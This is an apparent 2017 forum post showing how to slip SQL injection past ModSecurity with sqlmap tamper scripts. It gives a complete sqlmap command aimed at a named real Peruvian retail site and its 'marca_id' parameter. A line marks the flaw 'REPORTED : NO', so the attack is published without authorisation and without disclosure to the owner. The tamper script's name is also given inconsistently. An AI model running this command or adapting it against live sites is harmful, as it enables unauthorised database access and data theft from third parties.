Evolve Mod_Security with SQLMAP Tampers

Sep 10, 2017 06:27 PM
Sep 10, 2017 06:37 PM
636406392886072106.jpg

Hello !!

as everyone will have spent some time trying to make an injection for GET in a page and appears

appears the famous announcement of Mod_Security that does not let you inject.

636406392886072106.jpg

But if you thought that was the end of the game is very wrong, there will always be SQLMAP to the rescue with its 47 Tampers (which are the ones that come by default in the latest version) which will get you out of more of a hurry ;).

For this example we will use "modsecurityversioned.py" (which only works with MySQL).

If you want more information about each one you have to go to sqlmap / tamper /, where you will find all available and within each file there is an explanation of its functionality

To use a Tamper in SQLMAP is very simple you should only add the option

Code:

-- tamper name

The example of injection we will do with a Peruvian page of sale of electronic articles (I hope do not bother them) D.

URL : https://impulso.com.pe

Tool : SQLMAP Tamper : modsecurityzeroversioned.py

Xploit :

Code:

sqlmap.py -u "https://impulso.com.pe/detalle_marca.php?marca_id=24&cat_id=5" --dbms "MySQL" -p "marca_id" --tamper "modsecurityzeroversioned.py" --batch

result

636406394786739061.jpg

REPORTED : NO

Comments

No Comments Exist

Be the first, drop a comment!